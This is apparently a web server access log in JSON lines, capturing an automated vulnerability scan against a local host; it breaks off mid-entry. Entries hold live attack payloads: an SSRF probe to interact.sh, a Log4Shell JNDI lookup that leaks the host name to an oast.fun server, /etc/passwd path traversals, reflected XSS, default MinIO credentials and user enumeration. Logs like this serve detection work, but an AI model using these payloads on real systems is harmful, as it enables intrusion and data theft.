/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://interact.sh/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_admin/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"{\x22message\x22:\x22{\x5C\x22msg\x5C\x22:\x5C\x22method\x5C\x22,\x5C\x22method\x5C\x22:\x5C\x22sendForgotPasswordEmail\x5C\x22,\x5C\x22params\x5C\x22:[\x5C\x22user@local.email\x5C\x22],\x5C\x22id\x5C\x22:\x5C\x223\x5C\x22}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /maint/index.php?packages HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"127.0.0.1/maint/index.php?packages", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"${jndi:${lower:d}n${lower:s}://${env:hostName}.c9v8h8gsmpv8c1qg07h0iiwqeawxsmanz.oast.fun}"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"wimToken=&userid_work=&userid=YWRtaW4=&password_work=&password=&open=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.998","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/users/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"[\x22127.0.0.1:443/ui/\x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /casa/nodes/thumbprints HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opennms/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22params\x22:{\x22username\x22:\x22minioadmin\x22,\x22password\x22:\x22minioadmin\x22},\x22method\x22:\x22Web.Login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /minio/webrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /HelpTheHelpDesk.jsdbx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bolt/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/scripts/login_par.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetSrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"127.0.0.1/maint/index.php?packages", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/EPSONCONNECT HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rest_route=/wp/v2/users/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hedwig.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"{\x0D\x0A 